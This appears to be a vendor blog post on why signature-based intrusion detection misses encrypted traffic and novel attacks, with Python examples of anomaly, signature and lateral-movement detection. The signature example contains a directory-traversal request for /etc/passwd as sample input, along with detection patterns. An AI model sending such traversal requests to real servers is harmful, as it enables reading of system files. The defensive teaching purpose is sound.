From the beginning, full-spectrum intrusion detection has called for more than signatures: NIST SP 800-94 describes signature-based, anomaly-based, and stateful protocol analysis as complementary detection methods. Signature matching was well understood early on, but detecting new behaviors and anomalies in dynamic environments proved difficult to achieve with manual analysis techniques.

Today, machine learning (ML) has become the foundation for delivering what is sorely lacking in threat detection and response solutions: behavioral, anomaly, peer-group, and rules-based pattern detections. Machine learning is critically important because it allows the technology to detect both known and unknown attacker tactics, techniques, and procedures (TTPs). Sophisticated threat actors will continuously find new and inventive ways to gain access to the network, and standalone, signature-only IDS has demonstrated that it can't keep up with both known and unknown threats.
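To make the behavioral and peer-group idea concrete, here is an added example (not ExtraHop's models or code) that runs two detections over constructed flow summaries: a peer-group outlier check, which compares each host's outbound volume against the median of its own role group using a robust z-score, and a first-seen check, which flags a host using a destination port it never used during the baseline window. The host names, groups, byte counts, and the 3.5 threshold are all assumptions chosen for illustration.

```python
"""Peer-group and first-seen behavioral detections over flow summaries.

Added example with constructed data; not ExtraHop's detection models.
"""
from collections import defaultdict
from statistics import median
from typing import List, NamedTuple, Tuple


class Flow(NamedTuple):
    host: str        # source host (constructed names)
    group: str       # peer group, e.g. derived from device role or subnet
    dst_port: int    # destination port of the summarized flows
    bytes_out: int   # bytes sent by host to that port in the window


# Constructed baseline window (e.g. the previous seven days).
BASELINE = [
    Flow("ws1", "workstation", 443, 11_000_000),
    Flow("ws2", "workstation", 443, 10_000_000),
    Flow("ws3", "workstation", 443, 12_000_000),
    Flow("ws4", "workstation", 443, 9_000_000),
    Flow("ws5", "workstation", 443, 12_000_000),
    Flow("bk1", "backup", 445, 790_000_000),
    Flow("bk2", "backup", 445, 760_000_000),
    Flow("bk3", "backup", 445, 810_000_000),
]

# Constructed current window. ws3 now pushes ~890 MB over SSH, which is normal
# volume for a backup server but wildly abnormal for a workstation.
CURRENT = [
    Flow("ws1", "workstation", 443, 12_000_000),
    Flow("ws2", "workstation", 443, 9_000_000),
    Flow("ws3", "workstation", 443, 10_000_000),
    Flow("ws3", "workstation", 22, 890_000_000),
    Flow("ws4", "workstation", 443, 8_000_000),
    Flow("ws5", "workstation", 443, 13_000_000),
    Flow("bk1", "backup", 445, 800_000_000),
    Flow("bk2", "backup", 445, 750_000_000),
    Flow("bk3", "backup", 445, 820_000_000),
]


def robust_z(values: List[int], x: int) -> float:
    """Median/MAD z-score: resistant to the outlier we are trying to find."""
    med = median(values)
    mad = median([abs(v - med) for v in values]) or 1.0  # avoid divide-by-zero
    return (x - med) / (1.4826 * mad)  # 1.4826 scales MAD to a std-dev estimate


def peer_group_outliers(flows: List[Flow], threshold: float = 3.5) -> List[Tuple[str, str, int, float]]:
    """Flag hosts whose total outbound bytes are far above their peer group's median."""
    totals = defaultdict(int)
    groups = {}
    for f in flows:
        totals[f.host] += f.bytes_out
        groups[f.host] = f.group
    by_group = defaultdict(list)
    for host, total in totals.items():
        by_group[groups[host]].append(total)
    findings = []
    for host, total in totals.items():
        z = robust_z(by_group[groups[host]], total)
        if z > threshold:
            findings.append((host, groups[host], total, round(z, 1)))
    return findings


def first_seen_ports(baseline: List[Flow], current: List[Flow]) -> List[Tuple[str, int]]:
    """Flag (host, port) pairs present now but absent from the baseline window."""
    seen = defaultdict(set)
    for f in baseline:
        seen[f.host].add(f.dst_port)
    return sorted({(f.host, f.dst_port) for f in current if f.dst_port not in seen[f.host]})


if __name__ == "__main__":
    print("peer-group outliers:", peer_group_outliers(CURRENT))
    print("first-seen ports:", first_seen_ports(BASELINE, CURRENT))
```

The backup servers move far more data than ws3 in absolute terms, yet they are not flagged because they are scored against their own peers; a single global threshold would either miss ws3 or page on every backup job. Neither check needs a signature for the tool the attacker used.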

Encrypted Data and an Expanding Perimeter

IDS was developed when most network traffic was delivered in cleartext. Today, encryption is the most common tactic for securing data; for example, about 95% of traffic across Google is encrypted. A signature-only IDS that cannot decrypt sees little more than connection metadata for such traffic. As a result, IDS is blind to much of the important, the mundane, and the dangerous traffic crossing the perimeter or moving laterally through data centers and cloud infrastructure.
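The following added example (not ExtraHop code, and not a real ruleset) shows the mechanics described above: a toy signature engine in the spirit of Snort/Suricata content rules, run over constructed packets. The same request is sent once in cleartext on port 80 and once scrambled to stand in for TLS on port 443; the signatures fire on the first and see nothing in the second. The signature IDs, patterns, payloads, and the repeating-key XOR used as a placeholder for encryption are all illustrative assumptions (the XOR is not real encryption and is used only so the example runs offline).

```python
"""Toy signature-based IDS: what it sees in cleartext and misses once encrypted.

Added example with constructed signatures and packets; not ExtraHop code.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    dport: int
    payload: bytes  # application-layer bytes as seen on the wire


@dataclass(frozen=True)
class Signature:
    sid: int
    msg: str
    dport: Optional[int]        # None means "any port"
    pattern: re.Pattern          # content match against the payload bytes


# Constructed signatures in the shape of IDS content rules (illustrative only).
SIGNATURES = [
    Signature(1000001, "HTTP request for suspicious executable name", 80,
              re.compile(rb"GET /[^ ]*\.exe HTTP/1\.[01]")),
    Signature(1000002, "Directory traversal in URI", 80,
              re.compile(rb"(?:\.\./){2,}")),
    Signature(1000003, "Known-bad beacon User-Agent", None,
              re.compile(rb"User-Agent: EvilBeacon/1\.0", re.IGNORECASE)),
]


def match(packet: Packet) -> List[Signature]:
    """Return every signature whose port filter and content pattern match."""
    hits = []
    for sig in SIGNATURES:
        if sig.dport is not None and sig.dport != packet.dport:
            continue
        if sig.pattern.search(packet.payload):
            hits.append(sig)
    return hits


def scramble(plaintext: bytes, key: bytes) -> bytes:
    """Stand-in for TLS so the example runs offline: repeating-key XOR.

    This is NOT encryption and must never be used as such; it only makes the
    bytes on the wire differ from the plaintext the signatures were written for.
    """
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(plaintext))


def run(packets: List[Packet]) -> List[Tuple[str, str, int, str]]:
    """Emit one alert tuple per (packet, matching signature), like a legacy IDS."""
    alerts = []
    for p in packets:
        for sig in match(p):
            alerts.append((p.src, p.dst, sig.sid, sig.msg))
    return alerts


# Constructed request carrying two signature-worthy features.
CLEARTEXT = (b"GET /../../../etc/passwd HTTP/1.1\r\n"
             b"Host: 10.0.0.5\r\n"
             b"User-Agent: EvilBeacon/1.0\r\n\r\n")
KEY = b"\x5a\xa5\x3c"

SAMPLE = [
    Packet("10.0.0.20", "10.0.0.5", 80, CLEARTEXT),                  # cleartext
    Packet("10.0.0.20", "10.0.0.5", 443, scramble(CLEARTEXT, KEY)),  # "encrypted"
    Packet("10.0.0.21", "10.0.0.5", 80, b"GET /index.html HTTP/1.1\r\nHost: 10.0.0.5\r\n\r\n"),
]

if __name__ == "__main__":
    for alert in run(SAMPLE):
        print(alert)
```

Only the cleartext packet produces alerts (the traversal rule and the User-Agent rule); the scrambled copy of the very same request on 443 produces none, even though the attacker's intent is identical. What remains observable for the encrypted flow is its metadata (endpoints, port, timing, volume), which is where behavioral detection has to do its work.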

The perimeter surrounding the network also continues to expand, with unmanaged devices and cloud workloads crossing boundaries without any observable security state. These devices can become infected outside of a security team's purview or through alternative communication channels, such as third-party VPNs, mobile side channels, or trusted peering networks. Such paths are unobservable by a perimeter-facing IDS.

Attacks are More Advanced

Software vulnerabilities were the primary threat consideration when IDS was designed, and CVEs remain an important security concern. However, attackers now prefer other routes in, such as social engineering, stolen credentials, or human error (misconfigurations), finding these tactics more effective than developing or buying expensive zero-day exploits.

The defender’s dilemma states that modern attackers only have to get it right once, whereas defenders have to get it right every time to prevent a breach at the perimeter. IDS lacks the defense-in-depth detection backup against attackers sneaking past legacy prevention defenses as they land and pivot toward valuable data.

Alert Fatigue

Legacy IDS inspects traffic as it passes by, looking for a pattern that matches a signature in its library. When it detects a match, the IDS triggers an alert. Unfortunately, most IDS stop at the alert, leaving time-strapped analysts to search for root cause with other investigation tools and, in some cases, to pull forensic evidence from a separate PCAP repository.

These alerts have grown cumbersome for many SOC analysts. Every signature match triggers an alert regardless of context, so traffic that happens to resemble a broad signature will sound the alarm again and again, which overwhelms analysts and increases mean time to resolution.

The Next Evolution of IDS

There have been great improvements in cybersecurity, such as endpoint detection and response (EDR) and security information and event management (SIEM) solutions. However, these technologies still lack the broad visibility needed to improve the quality of alerts and eliminate blind spots.

One solution that can improve IDS functionality is network detection and response (NDR). NDR monitors both north-south and east-west traffic for malicious activity and policy violations. It also utilizes full-spectrum detection powered by ML behavioral analysis and high-risk CVE exploit identification, and combines those capabilities with streamlined incident response workflows.
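As an added example of what monitoring east-west traffic buys you (not ExtraHop code or detection logic), the block below classifies constructed flow records as north-south or east-west using the RFC 1918 ranges, then applies a simple lateral-movement heuristic: one internal source reaching five or more distinct internal hosts on administrative ports within a short window. A perimeter-facing IDS never sees these flows at all. The addresses, timestamps, port list, window, and fan-out threshold are assumptions chosen for illustration.

```python
"""North-south vs east-west classification and a lateral-movement fan-out check.

Added example with constructed flows; not ExtraHop's detectors.
"""
import ipaddress
from collections import defaultdict
from typing import List, NamedTuple, Tuple

# Explicit RFC 1918 ranges. ipaddress.is_private is deliberately avoided: it also
# treats documentation ranges such as 203.0.113.0/24 as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed set of administrative ports worth watching for fan-out.
ADMIN_PORTS = {22, 445, 3389, 5985, 5986}


class Flow(NamedTuple):
    ts: int      # seconds since start of the capture window (constructed)
    src: str
    dst: str
    dport: int


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def direction(flow: Flow) -> str:
    """east-west if both ends are internal, otherwise north-south."""
    return "east-west" if is_internal(flow.src) and is_internal(flow.dst) else "north-south"


def lateral_fanout(flows: List[Flow], window: int = 300, min_targets: int = 5) -> List[Tuple[str, int]]:
    """Flag sources that reach >= min_targets distinct internal hosts on admin ports within `window` seconds."""
    per_src = defaultdict(list)
    for f in flows:
        if direction(f) == "east-west" and f.dport in ADMIN_PORTS:
            per_src[f.src].append((f.ts, f.dst))
    findings = []
    for src, events in per_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # every distinct destination reached within `window` of this event
            targets = {dst for ts, dst in events[i:] if ts - start <= window}
            if len(targets) >= min_targets:
                findings.append((src, len(targets)))
                break
    return findings


# Constructed capture. A jump host does three RDP sessions spread over two hours;
# a compromised workstation sweeps eight internal hosts over SMB in one minute
# and also beacons out to an external address on 443.
SAMPLE = (
    [Flow(0, "10.0.0.10", "10.0.2.1", 3389),
     Flow(3600, "10.0.0.10", "10.0.2.2", 3389),
     Flow(7200, "10.0.0.10", "10.0.2.3", 3389)]
    + [Flow(100 + 7 * i, "10.0.1.55", f"10.0.2.{i + 1}", 445) for i in range(8)]
    + [Flow(120, "10.0.1.55", "203.0.113.7", 443)]
)


def summarize(flows: List[Flow]) -> dict:
    counts = defaultdict(int)
    for f in flows:
        counts[direction(f)] += 1
    return dict(counts)


if __name__ == "__main__":
    print("direction counts:", summarize(SAMPLE))
    print("lateral fan-out:", lateral_fanout(SAMPLE))
```

The jump host is not flagged because its admin sessions are spread out; the workstation is, because eight distinct SMB targets in about a minute is a pattern of a host, not of a signature. In practice the threshold and port list would come from the environment's own baseline rather than constants.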

When SOC analysts can see more, they know more clearly how to stop advanced threats. IDS is long overdue for an upgrade, and the next evolution should include key NDR capabilities to bolster a stronger security posture and maintain compliance requirements.
